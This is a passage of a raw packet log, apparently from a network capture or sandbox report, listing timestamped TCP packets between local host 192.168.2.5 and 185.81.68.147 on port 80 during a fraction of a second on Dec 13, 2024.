                                                                                                                                                                Dec 13, 2024 01:37:11.105760098 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.105839014 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.106563091 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.106688976 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.106769085 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.107481956 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.107595921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.107665062 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.108386993 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.108498096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.108573914 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.109350920 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.109441996 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.109517097 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.110213041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.110317945 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.110395908 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.111129999 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.111275911 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.111341953 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.112036943 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.112169981 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.112240076 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.112947941 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.113059998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.113137960 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.113867044 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.113989115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.114074945 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.114763021 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.114873886 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.114957094 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.115679979 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.115824938 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.115901947 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.116548061 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.160995007 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.260776043 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.260859966 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.260946989 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.261255026 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.261354923 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.261399031 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.262132883 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.262269974 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.262315035 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.263060093 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.263237953 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.263283968 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.263936043 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.263992071 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.264034033 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.264842033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.264956951 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.265031099 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.265758991 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.265906096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.265980005 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.266673088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.266787052 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.266866922 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.267601967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.267690897 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.267759085 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.268507004 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.268657923 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.268721104 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.269413948 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.269503117 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.269572020 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.270334959 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.270464897 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.270529985 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.271229029 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.271379948 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.271449089 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.272193909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.272432089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.272504091 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.273121119 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.273179054 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.273261070 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.273953915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.274101973 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.274174929 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.274858952 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.274991989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.275068045 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.275779009 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.275895119 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.275970936 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.276683092 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.276835918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.276915073 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.277612925 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.277712107 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.277779102 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.278518915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.278621912 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.278687000 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.279481888 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.279500008 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.279562950 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.280338049 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.280442953 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.280509949 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.281303883 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.281383038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.281457901 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.282144070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.282260895 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.282346964 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.283071995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.283164024 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.283231020 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.284012079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.284204006 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.284286022 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.284909010 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.285119057 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.285197973 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.285775900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.285911083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.285979986 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.286695004 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.286834955 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.286902905 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.287595987 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.287718058 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.287790060 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.288516045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.288665056 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.288731098 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.289412022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.289567947 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.289633036 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.290332079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.290452003 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.290527105 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.291297913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.291429043 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.291506052 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.292149067 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.292192936 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.292256117 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.293062925 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.293140888 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.293204069 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.293977022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.294101954 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.294167995 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.294872999 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.294987917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.295063019 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.295797110 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.295911074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.295988083 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.296684027 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.296812057 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.296878099 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.297596931 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.297712088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.297776937 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.298521042 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.298629045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.298693895 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.299464941 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.299643040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.299707890 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.300343037 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.300472975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.300551891 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.301268101 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.301373959 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.301453114 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.302135944 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.302273035 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.302345037 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.303059101 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.303158998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.303227901 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.303960085 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.304075956 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.304152012 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.304887056 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.304991961 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.305071115 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.307648897 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.307707071 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.307723045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.307774067 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.307853937 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.307869911 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.307887077 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.307924986 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.307941914 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.308511972 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.348417044 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.452769995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.452915907 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.453115940 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.453177929 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.453273058 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.453363895 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.454062939 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.454190969 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.454277992 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.454956055 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.455118895 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.455197096 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.455892086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.455985069 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.456060886 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.456792116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.456897020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.456975937 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.457709074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.457802057 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.457866907 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.458602905 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.458765984 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.458842039 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.459510088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.459606886 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.459681034 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.460418940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.460525036 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.460601091 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.461324930 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.461412907 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.461488962 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.462222099 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.462361097 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.462435961 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.463184118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.463262081 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.463363886 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.464052916 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.464169025 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.464243889 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.464965105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.465097904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.465171099 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.465887070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.466017008 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.466090918 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.466809034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.466919899 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.466996908 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.467730045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.467818975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.467897892 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.468624115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.468755960 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.468833923 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.469533920 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.469660997 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.469742060 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.470458031 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.470581055 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.470658064 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.471362114 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.471448898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.471527100 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.472242117 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.472372055 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.472451925 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.473215103 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.473273993 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.473377943 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.474061012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.474189997 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.474268913 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.474961996 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.475085974 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.475164890 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.475869894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.476016998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.476095915 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.476802111 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.476908922 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.476994038 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.477700949 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.477821112 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.477900028 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.478620052 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.478756905 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.478835106 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.479538918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.479631901 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.479708910 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.480441093 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.480593920 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.480670929 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.481363058 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.481456995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.481534004 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.482292891 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.482506990 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.482589960 CET4970780192.168.2.5185.81.68.147
